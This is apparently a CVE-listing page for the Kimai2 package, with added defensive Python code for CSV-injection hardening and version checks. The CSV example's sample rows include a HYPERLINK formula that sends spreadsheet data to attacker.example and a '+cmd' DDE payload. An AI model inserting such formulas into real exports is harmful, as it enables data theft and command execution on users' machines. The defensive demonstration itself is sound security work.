kevinpapst/kimai2
Packagist. 9 known CVEs affecting this package.
Aggregated from OSV, GitHub Security Advisories, NVD, and vendor advisories. Each CVE links to its full detail page with vendor advisories, patches, fixed versions, and remediation guidance.
CVEs affecting kevinpapst/kimai2
| CVE | Severity | CVSS | Fixed in | Published | Vulnerable versions (as listed by the aggregator) | Summary |
|---|---|---|---|---|---|---|
| CVE-2019-15481 | MEDIUM | 6.1 | 1.1 | 2019-08-23 | 0.1 ... 1.0.1 (13 versions) | Kimai v2 before 1.1 has XSS via a timesheet description. |
| CVE-2021-3957 | MEDIUM | 4.3 | 1.16 | 2021-11-19 | 0.1 ... 1.9 (44 versions) | Cross-Site Request Forgery (CSRF). |
| CVE-2021-3963 | MEDIUM | 4.3 | 1.16 | 2021-11-19 | 0.1 ... 1.9 (44 versions) | Cross-Site Request Forgery (CSRF). |
| CVE-2021-3976 | MEDIUM | 6.5 | 1.16.2 | 2021-11-19 | 0.1 ... 1.9 (46 versions) | Cross-Site Request Forgery (CSRF). |
| CVE-2021-3983 | MEDIUM | 6.1 | 1.16.3 | 2021-12-01 | 0.1 ... 1.9 (47 versions) | Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). |
| CVE-2021-3985 | CRITICAL | 9.0 | 1.16.3 | 2021-12-01 | 0.1 ... 1.9 (47 versions) | Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). |
| CVE-2021-3992 | MEDIUM | 6.5 | 1.16.3 | 2021-12-01 | 0.1 ... 1.9 (47 versions) | Improper Access Control. |
| CVE-2021-4033 | MEDIUM | 6.5 | 1.16.7 | 2021-12-09 | 0.1 ... 1.9 (51 versions) | Cross-Site Request Forgery (CSRF). |
| CVE-2021-43515 | HIGH | 7.8 | 1.14.1 | 2022-04-08 | 0.1 ... 1.9 (34 versions) | CSV Injection (aka Excel Macro Injection or Formula Injection) when creating a new timesheet: a payload placed in the Description field is written into the exported CSV without neutralization, so a spreadsheet application that opens the file treats it as a formula. |

The page also shows an "EG" score for each entry; it equals the CVSS score in every row and is omitted above. Version ranges are reproduced as the aggregator displays them. For the 2021 entries the upper bound "1.9" is older than the listed fix release under numeric ordering (1.9 < 1.16), so use the "Fixed in" column, not the range, as the cut-off when checking a deployment.
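The CSV-injection entry above describes the mechanism but not what the export and its fix look like. The following is an added example, not Kimai's code and not the page's: it builds a small constructed timesheet export, shows that a naive writer leaves formula-like Description cells intact, and applies the usual neutralization (prefix the cell with a single quote so the spreadsheet keeps it as text). The row data, function names and the attacker host `attacker.example` are assumptions.

```python
"""Added example, not Kimai code: CSV formula injection via a timesheet
Description field, and a hardened export that neutralizes it."""
import csv
import io

# Constructed sample rows modelled on a timesheet export: (date, user, description).
# The two "mallory" descriptions are the kind of payload the advisory describes.
TIMESHEETS = [
    ("2021-12-01", "alice", "Code review for sprint 42"),
    ("2021-12-01", "mallory", "=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")"),
    ("2021-12-02", "mallory", "+cmd|' /C calc'!A0"),
    ("2021-12-02", "bob", "-1 hour, meeting moved"),
]

# Leading characters that make spreadsheet applications evaluate a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would treat the cell as a formula on import."""
    return cell.startswith(FORMULA_TRIGGERS)


def neutralize(cell: str) -> str:
    """Prefix formula-like cells with a single quote so they stay text.
    csv.writer handles the outer quoting; quoting alone does not stop
    evaluation, the leading character does."""
    return "'" + cell if is_formula_like(cell) else cell


def export_csv(rows, hardened: bool) -> str:
    """Write rows as CSV; hardened=False reproduces the vulnerable behaviour."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(["date", "user", "description"])
    for date, user, desc in rows:
        writer.writerow([date, user, neutralize(desc) if hardened else desc])
    return buf.getvalue()


def flagged_cells(csv_text: str) -> list[tuple[int, int]]:
    """Scan an exported CSV and return (row, col) of cells a spreadsheet
    would evaluate. Useful as a check on an export you did not produce."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c))
    return hits


if __name__ == "__main__":
    print("naive export flags:", flagged_cells(export_csv(TIMESHEETS, hardened=False)))
    print("hardened export flags:", flagged_cells(export_csv(TIMESHEETS, hardened=True)))
```

Note the last sample row: "-1 hour, meeting moved" is legitimate text that starts with a minus sign, so the hardened exporter quotes it too. That false positive is the accepted cost of the leading-character rule; a narrower rule (only `=`, `+`, `@`) would let `-` payloads through.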
Check whether kevinpapst/kimai2 is used in your infrastructure
EchelonGraph scans your cloud and SBOMs to map every package to your actual deployments. See blast radius for kevinpapst/kimai2 CVEs against the assets you own.
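For a local check that needs no scanner, the following added example (not EchelonGraph's or Kimai's code) decides which of the CVEs listed above apply to a given installed Kimai release, using the page's "Fixed in" versions as the cut-off. It compares releases numerically, which is the comparison the "0.1 ... 1.9" ranges above appear to lack. The `FIXED_IN` table is transcribed from the page; the installed version string is an assumed input that would normally come from the deployment.

```python
"""Added example, not EchelonGraph or Kimai code: map an installed Kimai
release to the CVEs above using the page's "Fixed in" versions."""
from itertools import zip_longest

# Transcribed from the table above: CVE -> first release containing the fix.
FIXED_IN = {
    "CVE-2019-15481": "1.1",
    "CVE-2021-3957": "1.16",
    "CVE-2021-3963": "1.16",
    "CVE-2021-3976": "1.16.2",
    "CVE-2021-3983": "1.16.3",
    "CVE-2021-3985": "1.16.3",
    "CVE-2021-3992": "1.16.3",
    "CVE-2021-4033": "1.16.7",
    "CVE-2021-43515": "1.14.1",
}


def parse_version(v: str) -> tuple[int, ...]:
    """Split a dotted release into integers so that 1.9 < 1.16.
    A plain string comparison gets this backwards, which is the likely
    origin of the "1.9" upper bounds shown on the page."""
    v = v.lstrip("vV").split("-", 1)[0]  # drop a leading 'v' and any pre-release suffix
    return tuple(int(part) for part in v.split("."))


def version_lt(a: str, b: str) -> bool:
    """True if release a is strictly older than b; missing components count as 0."""
    for x, y in zip_longest(parse_version(a), parse_version(b), fillvalue=0):
        if x != y:
            return x < y
    return False


def affected_cves(installed: str, fixed_in=FIXED_IN) -> list[str]:
    """CVEs whose fix landed after the installed release (installed < fixed)."""
    return sorted(cve for cve, fixed in fixed_in.items() if version_lt(installed, fixed))


if __name__ == "__main__":
    for release in ("1.0.1", "1.15", "1.16.7"):  # assumed inputs
        print(release, "->", affected_cves(release) or "none of the listed CVEs")
```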